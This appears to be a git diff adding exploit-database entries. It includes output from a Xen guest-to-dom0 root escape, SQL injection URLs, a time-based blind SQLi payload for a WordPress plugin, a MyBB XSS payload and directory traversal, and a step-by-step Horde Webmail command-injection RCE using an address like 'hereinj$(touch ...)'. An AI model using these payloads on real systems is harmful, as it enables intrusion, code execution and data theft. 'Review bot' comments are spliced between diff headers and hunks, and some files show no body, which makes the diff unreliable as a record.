+ MODPOST 1 modules +WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o + CC /root/privesc_poc/test.mod.o + LD [M] /root/privesc_poc/test.ko +make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic' +root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest' +press enter to continue + +root@pv-guest:~/privesc_poc# + + +dmesg in the unprivileged PV guest: + + +[ 721.413415] call_int_85 at 0xffffffffc0075a90 +[ 721.420167] backstop_85_handler at 0xffffffffc0075a93 +[ 722.801566] PML4 at ffff880002fe3000 +[ 722.808216] PML4 entry: 0x13bba4067 +[ 722.816161] ### trying to write crafted PUD entry... +[ 722.824178] ### writing byte 0 +[ 722.832193] write_byte_hyper(ffff88007a491008, 0x7) +[ 722.840254] write_byte_hyper successful +[ 722.848234] ### writing byte 1 +[ 722.856170] write_byte_hyper(ffff88007a491009, 0x80) +[ 722.864219] write_byte_hyper successful +[ 722.872241] ### writing byte 2 +[ 722.880215] write_byte_hyper(ffff88007a49100a, 0x35) +[ 722.889014] write_byte_hyper successful +[ 722.896232] ### writing byte 3 +[ 722.904265] write_byte_hyper(ffff88007a49100b, 0x6) +[ 722.912599] write_byte_hyper successful +[ 722.920246] ### writing byte 4 +[ 722.928270] write_byte_hyper(ffff88007a49100c, 0x0) +[ 722.938554] write_byte_hyper successful +[ 722.944231] ### writing byte 5 +[ 722.952239] write_byte_hyper(ffff88007a49100d, 0x0) +[ 722.961769] write_byte_hyper successful +[ 722.968221] ### writing byte 6 +[ 722.976219] write_byte_hyper(ffff88007a49100e, 0x0) +[ 722.984319] write_byte_hyper successful +[ 722.992233] ### writing byte 7 +[ 723.000234] write_byte_hyper(ffff88007a49100f, 0x0) +[ 723.008341] write_byte_hyper successful +[ 723.016254] ### writing byte 8 +[ 723.024357] write_byte_hyper(ffff88007a491010, 0x0) +[ 723.032254] write_byte_hyper successful +[ 723.040236] ### crafted PUD entry written +[ 723.048199] dummy +[ 723.056199] going to link PMD into target PUD +[ 723.064238] linked PMD into target 
PUD +[ 723.072206] going to unlink mapping via userspace PUD +[ 723.080230] mapping unlink done +[ 723.088251] copying HV and user shellcode... +[ 723.096283] copied HV and user shellcode +[ 723.104270] int 0x85 returned 0x7331 +[ 723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800 +[ 723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800 +[ 723.128226] remapped IDT entry for 0x80 to 0xffff804000100800 +[ 723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15 +[ 723.144291] int 0x85 returned 0x1337 +[ 723.152235] === END === + + +The supplied shell command executes in dom0 (and all other 64bit PV domains): + + +root@ubuntu:~# cat /tmp/owned_by_the_guest +uid=0(root) gid=0(root) groups=0(root) +root@ubuntu:~# + + +Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor. + + +I have tested the exploit in the following configurations: + +configuration 1: +running inside VMware Workstation +Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)" +dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu +unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu + +configuration 2: +running on a physical machine with Qubes OS 3.1 installed +Xen version 4.6.3 + +Proof of Concept: privesc_poc.tar.gz + +################################################################################ + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41870.zip + diff --git a/platforms/multiple/webapps/41865.html b/platforms/multiple/webapps/41865.html new file mode 100755 index 000000000..2e86061f0 --- /dev/null +++ b/platforms/multiple/webapps/41865.html @@ -0,0 +1,73 @@ + + + +

click anywhere

+ + diff --git a/platforms/multiple/webapps/41866.html b/platforms/multiple/webapps/41866.html new file mode 100755 index 000000000..55bec92a9 --- /dev/null +++ b/platforms/multiple/webapps/41866.html @@ -0,0 +1,61 @@ + + + + + + + + + diff --git a/platforms/php/webapps/41856.txt b/platforms/php/webapps/41856.txt new file mode 100755 index 000000000..8cda7a176 --- /dev/null +++ b/platforms/php/webapps/41856.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Classified Portal Software 5.1 - SQL Injection +# Google Dork: N/A +# Date: 11.04.2017 +# Vendor Homepage: http://www.myclassifiedscript.com/ +# Software: http://www.myclassifiedscript.com/demo.html +# Demo: http://www.clpage.com/ +# Version: 5.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search-result.php?keyword=&ad_id=222&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=[SQL]&sub.x=46&sub.y=8&searchkey=search_record +# http://localhost/[PATH]/search-result.php?keyword=&ad_id=[SQL]&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=&sub.x=46&sub.y=8&searchkey=search_record +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41857.txt b/platforms/php/webapps/41857.txt new file mode 100755 index 000000000..501d74fa7 --- /dev/null +++ b/platforms/php/webapps/41857.txt 
@@ -0,0 +1,97 @@
+=============================================
+MGC ALERT 2017-003
+- Original release date: April 06, 2017
+- Last revised: April 10, 2017
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
+
+II. BACKGROUND
+-------------------------
+WordPress event calendar is a FREE user-friendly responsive plugin to
+manage multiple recurring events and with various options.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal in the files:
+
+/spider-event-calendar/calendar_functions.php: if
+(isset($_POST['order_by'])) {
+/spider-event-calendar/widget_Theme_functions.php: if
+(isset($_POST['order_by']) && $_POST['order_by'] != '') {
+
+And when the query is executed, the parameter "order_by" it is not
+sanitized:
+
+/spider-event-calendar/front_end/frontend_functions.php: $rows =
+$wpdb->get_results($query." ".$order_by);
+
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+It is possible to inject SQL code.
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL have been confirmed to all suffer from Time Based SQL
+Injection.
+
+Time Based SQL Injection POC:
+
+POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1
+
+search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)
+(2 seconds of response)
+
+search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)
+(30 seconds of response)
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Spider Event Calendar <= 1.5.51
+
+VII. SOLUTION
+-------------------------
+Vendor release a new version.
+https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip
+
+VIII. REFERENCES
+-------------------------
+https://es.wordpress.org/plugins/spider-event-calendar/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+April 06, 2017 1: Initial release
+April 10, 2017 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
+April 06, 2017 2: Send to vendor
+April 07, 2017 3: Vendor fix the vulnerability and release a new version
+April 10, 2017 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/platforms/php/webapps/41858.txt
new file mode 100755
index 000000000..a1004d25a
--- /dev/null
+++ b/platforms/php/webapps/41858.txt
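Review bot: Section III states that exploitation requires HTTP/1.0, but the proof-of-concept request in section IV is sent as `POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1`; one of the two should be corrected so a reader can reproduce the finding. The request also targets wp-admin and carries `nonce_sp_cal=1e91ab0f6b`, which suggests an authenticated WordPress session and a per-session nonce are preconditions, so section IV or VI should state the privilege level needed — the 7,1 score reads very differently for an unauthenticated versus a logged-in attacker. On remediation, the sink shown is `$wpdb->get_results($query." ".$order_by)`: an ORDER BY fragment cannot be bound as a prepared-statement parameter, so section VII could add that `order_by` must be validated against an allow-list of column names rather than escaped.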
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Social Directory Script 2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 11.04.2017
+# Vendor Homepage: http://www.phponly.com/
+# Software: http://www.phponly.com/Social-Directory.html
+# Demo: http://www.phponly.com/demo/link/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?subcategory=[SQL]
+# http://localhost/[PATH]/searchtopic.php?search=[SQL]
+# http://localhost/[PATH]/index.php?category=[SQL]
+# phponly_link_admin:id
+# phponly_link_admin:username
+# phponly_link_admin:password
+# # # # #
diff --git a/platforms/php/webapps/41859.txt
new file mode 100755
index 000000000..b975f02f0
--- /dev/null
+++ b/platforms/php/webapps/41859.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: FAQ Script 3.1.3 - SQL Injection
+# Google Dork: N/A
+# Date: 11.04.2017
+# Vendor Homepage: http://www.phponly.com/
+# Software: http://www.phponly.com/faq.html
+# Demo: http://www.phponly.com/demo/faq/
+# Version: 3.1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/home/categorySearch?category_id=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41860.txt
new file mode 100755
index 000000000..4c72553e7
--- /dev/null
+++ b/platforms/php/webapps/41860.txt
@@ -0,0 +1,29 @@
+Description:
+============
+
+product:MyBB
+Homepage:https://mybb.com/
+vulnerable version:<1.8.11
+Severity:High risk
+
+===============
+
+Proof of Concept:
+=============
+
+1.post a thread or reply any thread ,write:
+
+[email=2"onmouseover="alert(document.location)]hover me[/email]
+
+then when user’s mouse hover it,XSS attack will occur!
+
+============
+
+Fixed:
+============
+
+This vulnerability was fixed in version 1.8.11
+
+https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
+
+=============
\ No newline at end of file
diff --git a/platforms/php/webapps/41862.txt
new file mode 100755
index 000000000..7c36ff026
--- /dev/null
+++ b/platforms/php/webapps/41862.txt
@@ -0,0 +1,35 @@
+Description:
+============
+
+product: MyBB
+Homepage: https://mybb.com/
+vulnerable version: < 1.8.11
+Severity: Low risk
+
+===============
+
+Proof of Concept:
+=============
+
+vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple
+
+vulnerability file directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php
+
+vulnerability Code:
+
+Line 326 $path = $mybb->input['pathfolder'];
+
+Line 327 $dir = @opendir(MYBB_ROOT.$path);
+
+if we input "pathfolder" to "../../bypass/smile",Directory Traversal success!
+
+============
+
+Fixed:
+============
+
+This vulnerability was fixed in version 1.8.11
+
+https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
+
+=============
\ No newline at end of file
diff --git a/platforms/php/webapps/41864.txt
new file mode 100755
index 000000000..5abe32bc2
--- /dev/null
+++ b/platforms/php/webapps/41864.txt
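Review bot: The 41862 proof of concept stops at `if we input "pathfolder" to "../../bypass/smile",Directory Traversal success!` without saying what the traversal yields, so the "Low risk" rating cannot be checked against the text. The only sink shown is `Line 327 $dir = @opendir(MYBB_ROOT.$path);`, which opens a directory rather than a file, and the vulnerable address sits under `/admin/index.php?module=config-smilies`, which suggests an authenticated administrator session is a precondition; a sentence stating the required privilege and the observed effect (for example which directory contents become visible) would make the rating verifiable. The `@` on line 327 also suppresses the opendir failure, which is worth a mention for defenders since a failed traversal attempt presumably leaves no PHP warning in the server log.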
@@ -0,0 +1,865 @@ +Source: https://blogs.securiteam.com/index.php/archives/3107 + +Vulnerabilities Summary +The following advisory describes two (2) vulnerabilities found in +Horde Groupware Webmail. + +Horde Groupware Webmail Edition is a free, enterprise ready, browser +based communication suite. Users can read, send and organize email +messages and manage and share calendars, contacts, tasks, notes, +files, and bookmarks with the standards compliant components from the +Horde Project. Horde Groupware Webmail Edition bundles the separately +available applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo, +Gollem, and Trean. + +It can be extended with any of the released Horde applications or the +applications that are still in development, like a bookmark manager or +a file manager. + +Affected versions: Horde 5, 4 and 3 + +The vulnerabilities found in Horde Groupware Webmail are: + +Authentication Remote Code Execution +Unauthentication Remote Code Execution + +Credit +An independent security researcher has reported this vulnerability to +Beyond Security’s SecuriTeam Secure Disclosure program. + +Vendor response +Horde has released a patch to address the vulnerabilities. + +For more information: +https://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html + +Vulnerabilities Details + +Authentication Remote Code Execution +Horde Webmail contains a vulnerability that allows a remote attacker +to execute arbitrary code with the privileges of the user who runs the +web server. + +For successful attack GnuPG feature should be enabled on the target +server (path to gpg binary should be defined in $conf[gnupg][path] +setting). + +Vulnerable code: encryptMessage() function of GPG feature. + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 416 */ public function encryptMessage($text, $params) +/* 417 */ { +/* … */ +/* 435 */ foreach (array_keys($params['recips']) as $val) { +/* 436 */ $cmdline[] = '--recipient ' . $val; +#! 
vulnerable code +/* … */ +/* 444 */ /* Encrypt the document. */ +/* 445 */ $result = $this->_callGpg( +/* 446 */ $cmdline, +/* 447 */ 'w', +/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'], +/* 449 */ true, +/* 450 */ true +/* 451 */ ); + +$params[‘recips’] will be added to $cmdline array and passed to _callGpg(): + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 642 */ public function _callGpg( +/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false, +/* 644 */ $parseable = false, $verbose = false +/* 645 */ ) +/* 646 */ { +/* … */ +/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options)); +/* … */ +/* 681 */ if ($mode == 'w') { +/* 682 */ if ($fp = popen($cmdline, 'w')) { #! +vulnerable code +/* … */ + +We can see that our recipients (addresses) will be in command line +that is going to be executed. encryptMessage() function can be reached +by various API, requests. For example it will be called when user try +to send encrypted message. + +Our request for encryption and sending our message will be processed +by buildAndSendMessage() method: +Path: /imp/lib/Compose.php + +/* 733 */ public function buildAndSendMessage( +/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array() +/* 735 */ ) +/* 736 */ { +/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session; +/* 738 */ +/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit +/* 740 */ * characters can be in the address fields. */ +/* 741 */ $recip = $this->recipientList($header); +/* ... */ +/* 793 */ /* Must encrypt & send the message one recipient at a time. */ +/* 794 */ if ($prefs->getValue('use_smime') && +/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT, +IMP_Crypt_Smime::SIGNENC))) { +/* ... */ +/* 807 */ } else { +/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt +/* 809 */ * multiple addresses in the same message. 
*/ +/* 810 */ $msg_options['from'] = $from; +/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body, +$msg_options); #! vulnerable code + +In line 741 it tries to create recipient list: Horde parsers values of +‘to’, ‘cc’, ‘bcc’ headers and creates list of Rfc822 addresses. In +general there are restrictions for characters in addresses but if we +will use the next format: + +display-name <"somemailbox"@somedomain.com> + +somemailbox will be parsed by _rfc822ParseQuotedString() method: + +Path: /Horde/Mail/Rfc822.php: + +/* 557 */ protected function _rfc822ParseQuotedString(&$str) +/* 558 */ { +/* 559 */ if ($this->_curr(true) != '"') { +/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.'); +/* 561 */ } +/* 563 */ while (($chr = $this->_curr(true)) !== false) { +/* 564 */ switch ($chr) { +/* 565 */ case '"': +/* 566 */ $this->_rfc822SkipLwsp(); +/* 567 */ return; +/* 569 */ case "\n": +/* 570 */ /* Folding whitespace, remove the (CR)LF. */ +/* 571 */ if (substr($str, -1) == "\r") { +/* 572 */ $str = substr($str, 0, -1); +/* 573 */ } +/* 574 */ continue; +/* 576 */ case '\\': +/* 577 */ if (($chr = $this->_curr(true)) === false) { +/* 578 */ break 2; +/* 579 */ } +/* 580 */ break; +/* 581 */ } +/* 583 */ $str .= $chr; +/* 584 */ } +/* 586 */ /* Missing trailing '"', or partial quoted character. */ +/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.'); +/* 588 */ } + +There are only a few limitations: + +we cannot use “ +\n will be deleted +we cannot use \ at the end of our mailbox + +After creation of recipient list buildAndSendMessage() will call +_createMimeMessage(): + +Path: /imp/lib/Compose.php + +/* 1446 */ protected function _createMimeMessage( +/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array() +/* 1448 */ ) +/* 1449 */ { +/* 1450 */ global $conf, $injector, $prefs, $registry; +/* ... */ +/* 1691 */ /* Set up the base message now. 
*/ +/* 1692 */ $encrypt = empty($options['encrypt']) +/* 1693 */ ? IMP::ENCRYPT_NONE +/* 1694 */ : $options['encrypt']; +/* 1695 */ if ($prefs->getValue('use_pgp') && +/* 1696 */ !empty($conf['gnupg']['path']) && +/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT, +IMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC, +IMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) { +/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp'); +/* ... */ +/* 1727 */ /* Do the encryption/signing requested. */ +/* 1728 */ try { +/* 1729 */ switch ($encrypt) { +/* ... */ +/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT: +/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT: +/* 1737 */ $to_list = clone $to; +/* 1738 */ if (count($options['from'])) { +/* 1739 */ $to_list->add($options['from']); +/* 1740 */ } +/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list, +($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ? +$symmetric_passphrase : null); +/* 1742 */ break; + +Here we can see validation (1695-1696 lines) that: + +Current user has enabled “use_pgp” feature in his preferences (it is +not a problem as an attacker can edit his own preferences) +$conf[‘gnupg’][‘path’] is not empty. This value can be edited only by +admin. So if we don’t have value here our server is not vulnerable. +But if admin wants to allow users to use GPG feature he/she needs to +define value for this config. + +Also we can see that in lines 1737-1739 to our recipient list will be +added address “from” as well. 
+ +Path: /imp/lib/Crypt/Pgp.php + +/* 584 */ public function impEncryptMimePart($mime_part, +/* 585 */ Horde_Mail_Rfc822_List $addresses, +/* 586 */ $symmetric = null) +/* 587 */ { +/* 588 */ return $this->encryptMimePart($mime_part, +$this->_encryptParameters($addresses, $symmetric)); +/* 589 */ } + +Before encryptMimePart() call Horde uses _encryptParameters() + +Path: /imp/lib/Crypt/Pgp.php + +/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List +$addresses, +/* 537 */ $symmetric) +/* 538 */ { +/* ... */ +/* 546 */ $addr_list = array(); +/* 548 */ foreach ($addresses as $val) { +/* 549 */ /* Get the public key for the address. */ +/* 550 */ $bare_addr = $val->bare_address; +/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr); +/* 552 */ } +/* 554 */ return array('recips' => $addr_list); +/* 555 */ } + +Horde will add to each address its Public Key. There a few source of +Public Keys: + +AddressBook (we will use this source) +Servers with Public Keys + +Note that Horde should be able to find Public Key for our “From” +address as well. +We can generate pair of PGP keys (https is required) or we can use the +same trick with AddressBook (we can create some contact, add any valid +Public PGP key, and add this address to default identity) +encryptMimePart() will call encrypt() method + +Path: /Horde/Crypt/Pgp.php + +/* 773 */ public function encryptMIMEPart($mime_part, $params = array()) +/* 774 */ { +/* 775 */ $params = array_merge($params, array('type' => 'message')); +/* … */ +/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params); + +It will call encryptMessage() + +Path: /Horde/Crypt/Pgp.php + +/* 554 */ public function encrypt($text, $params = array()) +/* 555 */ { +/* 556 */ switch (isset($params['type']) ? $params['type'] : false) { +/* 557 */ case 'message': +/* 558 */ $error = Horde_Crypt_Translation::t( +/* 559 */ "Could not PGP encrypt message." 
+/* 560 */ ); +/* 561 */ $func = 'encryptMessage'; +/* 562 */ break; +/* ... */ +/* 586 */ $this->_initDrivers(); +/* 587 */ +/* 588 */ foreach ($this->_backends as $val) { +/* 589 */ try { +/* 590 */ return $val->$func($text, $params); +/* 591 */ } catch (Horde_Crypt_Exception $e) {} +/* 592 */ } + +In conclusions: +If Horde server has enabled “GnuPG feature” any unprivileged user is +able to execute arbitrary code. + +Enable GPG feature for attacker account (“Enable PGP functionality?” +checkbox on “PGP Configure PGP encryption support.” section in +Prefferences->Mail page ) +Create some contact in the attacker AddressBook, add any valid Public +PGP key, and add this address to default identity +Create another contact in the attacker AddressBook, add any valid +Public PGP key, and change email address to some$(desired command to +execute) contact@somedomain.com +Create a new message to some$(desired command to execute) contact@somedomain.com +Choose Encryption:PGP Encrypt Message option +Click Send button + +And desired command will be executed on the Horde server. + +Proof of Concept – Authenticated Code Execution + +For Proof of Concept we can use preconfigured image of Horde server +from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs +that work on any platform”): + +https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova + +Step 1 – Login as admin (by default user:bitnami) and go to +Administration -> Configuration and choose Horde (horde). Open GnuPG +tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click +“Generate Horde Configuration“: + +Now we have enabled GPG feature on our server and we can login as +regular user and try to execute desired commands. But Bitnami image +does not have installed and configured Mail server so we need to use +external one or install it on local machine. 
+ +We will use gmail account (to be able to login to it from Horde I had +to change Gmail account setting Allow less secure apps: ON). + +To use external Mail server we need to change the next setting: +“Administrator Panel” -> “Configuration” -> “Horde” -> +“Authentication” + +Step 2 – Configure Horde web-mail authentication ($conf[auth][driver]) +to “Let a Horde application handle authentication” and click “Generate +Horde Configuration”: + +Step 3 – logout and login with your gmail account. Currently we are +login as regular user so we can try to execute desired commands: + +Go to Preferences -> Mail and click on PGP link. Check Enable PGP +functionality? checkbox and click “Save”: + +Create “from” contact in our AddressBook: “Address Book -> New Contact +-> in Address Book of …” + +Personal tab – Last Name: mymailboxwithPGPkey +Communication tab – Email: mymailboxwihPGP@any.com +Other tab – PGP Public Key: any valid Public PGP key. + +For example: + +-----BEGIN PGP PUBLIC KEY BLOCK----- +Version: SKS 1.1.6 +Comment: Hostname: keyserver.ubuntu.com +mQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01 +YPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ +5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D +/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82 +z77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/ +POGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr +72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch +zVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl +Y2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI +fQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC +AAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k +YI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep 
+fpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW +BQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ +HM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs +Or+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/ +VefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0 +P8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC +sqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw +gfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ +WyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv +iE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27 +kq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8= +=RHjX +-----END PGP PUBLIC KEY BLOCK----- + +Click “Add” button: + +Go to Preferences -> Global Preferences and click on Personal +Information link. Put mymailboxwihPGP@any.com into field The default +e-mail address to use with this identity and Click “Save”: + +Create our “to” contact in our AddressBook: “Address Book -> New +Contact -> in Address Book of …” + +Personal tab – Last Name: contact_for_attack +Communication tab – Email: hereinj@any.com +Other tab – PGP Public Key: any valid Public PGP key (it can be the +same as in the previous step) +And click “Add” button: + +Inject our command: Click on Edit. Go to Communication Tab, put cursor +in Email field and chose “Inspect Element (Q)” from context menu: + +Delete “email” from the type argument and close Inspector: + +1 + + +Edit the address as we want – for example hereinj$(touch +/tmp/hereisvuln)@any.com and click “Save”: + +Create a new message ( Mail -> New Message) with our contact as recipient: + +Choose PGP Encrypt Message in Encryption option: + +Enter any subject and any content. Click “Send” + +We will get “PGP Error:…” + +It is ok – let’s check our server: + +We have a new file “hereisvuln” so our command was executed. 
+ +Unauthentication Remote Code Execution +Horde Webmail contains a vulnerability that allows a remote attacker +to execute arbitrary code with the privileges of the user who runs the +web server. + +Vulnerable code: decryptSignature() function of GPG feature. + +Path: /Horde/Crypt/Pgp/Backend/Binary.php: + +/* 539 */ public function decryptSignature($text, $params) +/* 540 */ { +/* ... */ +/* 550 */ /* Options for the GPG binary. */ +/* 551 */ $cmdline = array( +/* 552 */ '--armor', +/* 553 */ '--always-trust', +/* 554 */ '--batch', +/* 555 */ '--charset ' . (isset($params['charset']) ? +$params['charset'] : 'UTF-8'), +/* 556 */ $keyring, +/* 557 */ '--verify' +/* 558 */ ); +/* ... */ +/* 571 */ $result = $this->_callGpg($cmdline, 'r', null, true, true, true); +/* ... */ + +$params[‘charset’] will be added to $cmdline array and passed to _callGpg(): + +/* 642 */ public function _callGpg( +/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false, +/* 644 */ $parseable = false, $verbose = false +/* 645 */ ) +/* 646 */ { +/* … */ +/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options)); +/* … */ +/* 681 */ if ($mode == 'w') { +/* … */ +/* 704 */ } elseif ($mode == 'r') { +/* 705 */ if ($fp = popen($cmdline, 'r')) { +/* … */ + +Our $params[‘charset’] will be in command line that is going to be executed. + +decryptSignature() is called from decrypt() method: + +Path – /Horde/Crypt/Pgp.php: + +/* 611 */ public function decrypt($text, $params = array()) +/* 612 */ { +/* 613 */ switch (isset($params['type']) ? $params['type'] : false) { +/* 614 */ case 'detached-signature': +/* 615 */ case 'signature': +/* 616 */ /* Check for required parameters. */ +/* 617 */ if (!isset($params['pubkey'])) { +/* 618 */ throw new InvalidArgumentException( +/* 619 */ 'A public PGP key is required to verify a signed message.' 
